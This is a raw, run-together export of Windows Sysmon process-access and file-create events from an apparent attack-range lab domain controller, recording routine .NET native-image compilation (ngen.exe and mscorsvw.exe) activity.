13:48:56.981{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91C8-6005-1703-00000000A301}3924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:56.981{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C8-6005-1703-00000000A301}3924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:56.903{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C8-6005-1603-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:56.887{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91C8-6005-1603-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:56.887{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C8-6005-1603-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:56.825{59A5CD1D-91C8-6005-1503-00000000A301}4532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11b4-0\System.ServiceProcess.dll2021-01-18 13:48:56.825 10341000x80000000000000007365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:56.715{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C8-6005-1503-00000000A301}4532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:56.700{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91C8-6005-1503-00000000A301}4532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:56.700{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C8-6005-1503-00000000A301}4532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:56.590{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C8-6005-1403-00000000A301}3600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:56.575{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91C8-6005-1403-00000000A301}3600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:56.575{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C8-6005-1403-00000000A301}3600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:56.497{59A5CD1D-91C8-6005-1303-00000000A301}1240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\4d8-0\System.Runtime.Remoting.dll2021-01-18 13:48:56.497 10341000x80000000000000007358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:56.012{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C8-6005-1303-00000000A301}1240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:55.997{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91C8-6005-1303-00000000A301}1240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:55.997{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C8-6005-1303-00000000A301}1240C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:57.981{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C9-6005-1B03-00000000A301}1580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:57.965{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91C9-6005-1B03-00000000A301}1580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:57.965{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C9-6005-1B03-00000000A301}1580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:57.762{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C9-6005-1A03-00000000A301}4928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:57.746{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91C9-6005-1A03-00000000A301}4928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:57.746{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C9-6005-1A03-00000000A301}4928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:57.700{59A5CD1D-91C9-6005-1903-00000000A301}4892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\131c-0\Accessibility.dll2021-01-18 13:48:57.700 10341000x80000000000000007379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:57.653{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C9-6005-1903-00000000A301}4892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:57.637{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91C9-6005-1903-00000000A301}4892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:57.637{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C9-6005-1903-00000000A301}4892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4